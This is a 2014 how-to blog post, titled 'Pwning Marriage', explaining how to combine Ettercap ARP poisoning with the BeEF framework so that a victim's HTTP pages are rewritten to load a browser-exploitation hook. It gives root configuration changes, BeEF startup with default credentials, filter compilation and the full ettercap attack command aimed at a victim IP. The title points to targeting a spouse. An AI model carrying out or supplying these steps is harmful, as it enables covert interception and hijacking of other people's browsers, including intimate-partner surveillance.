BeEF+Ettercap:Pwning Marriage

Aug 4, 2014 11:54 AM
635427235427945540.jpg

This is the best how-to's website that I've ever seen, and I wanted to join it. It taught me a lot, but, because I'm here to learn too, please correct me if I'm wrong.

You probably know that Ettercap is a very powerful tool for man in the middle attacks.

You probably know that Browser Exploitation Framework (BeEF) is a very powerful tool for browser exploitation.

But, do you know how powerful tare they... together?

This is my first how-to, so I wanted to start with something impressive, but easy to explain.

That's the same for this attack: easy and fast, and also easy to automate with few lines of bash script.

The point of this how-to is demonstrating how to use an Ettercap filter to inject a BeEF hook, so that every time our victim opens the browser , his/her computer is automatically hooked in BeEF, wherever browses.

To follow this tutorial you need Kali Linux.

Note: this won't work with HTTPS, you'll need SSLstrip for that.

Step 1: Setup Ettercap

We first need to do some changes to the Ettercap configuration file. To work properly Ettercap needs root access.

In the terminal, type: vi /etc/ettercap/etter.conf

635427163601442035.jpg

This should be the output:

635427164241910491.jpg

Type i to edit the file.

Change ec-uid = 65534 to ec-uid = 0 and ec-gid = 65534 to ec-gid = 0 (as shown in the picture).

Then scroll down and find this:

635427166371974113.jpg

Edit to this (uncomment last two lines):

635427166779664189.jpg

To exit the editor, type esc, then :wq to save.

Ettercap is ready.

Step 2: Setup BeEF

To setup BeEF, type in the terminal: cd /usr/share/beef-xss, then ./beef.

This should be the output:

635427169795742433.jpg

(The error you see is related to a Metasploit link I did, that won't show)

You can now open Iceweasel and type in the URL bar: http: //127.0.0.1:3000/ui/panel and login with default username beef and default password beef.

You should see the following:

635427172181661953.jpg

BeEF is ready.

Step 3: Create the Ettercap Filter.

Open LeafPad, or the text editor you prefer, and write:

635427243066383272.jpg

Where MACHINEIP is your machine ip, you can find it with the command ifconfig, or by checking the ./beef results, there is the complete URL.

It tells ettercap that whenever it captures a TCP packet coming from port 80 it has to redirect the packet back within the ARP poisoning contest, but edited.

Save as beefhook.filter.

In the terminal, navigate to the beefhook.filter folder, for example if you have the .filter in /Desktop

cd /root/Desktop

then type:

etterfilter beefhook.filter

this should be the output:

635427188958125951.jpg

As you noticed, a new file is created: filter.ef.

That's the Ettercap filter.

Step 4: Start Ettercap and Load the Filter

To inject the filter in the victim's browser sessions, I'm going to use the text interface of Ettercap,because it looks faster, however Ettercap GUI is better if your goal is to sniff packets.

In the terminal, type:

ettercap -T -q -F FILTERPATH -M ARP /VICTIMIP/ //

in our case:

ettercap -T -q -F /root/Desktop/filter.ef -M ARP /192.168.1.xxx/ //

635427197388849685.jpg

-T:Starts the text interface.

-q:Less verbose, doesn't show packet contents.

-F:Load filter at path.

-M:Attack type (ARP in this case)

/victim ip/ /victim 2/

635427197375660485.jpg

Now everytime out victim goes to a HTTP site, the filter will be injected.

The only two problems:

  1. If a web page uses instead of , just copy last if statement of the filter and paste under, replacing head with HEAD.
  2. Sometimes, it could fail, for example looks like it doesn't work very well on virtual machine, that's why I recommend to install Kali Linux as a dual boot, or USB Live.

I hope this post will be useful, thank you for reading.

Post in the comments about errors or mistakes I made.

Sorry for eventual grammar errors, but I'm not mother tongue.

Comments

No Comments Exist

Be the first, drop a comment!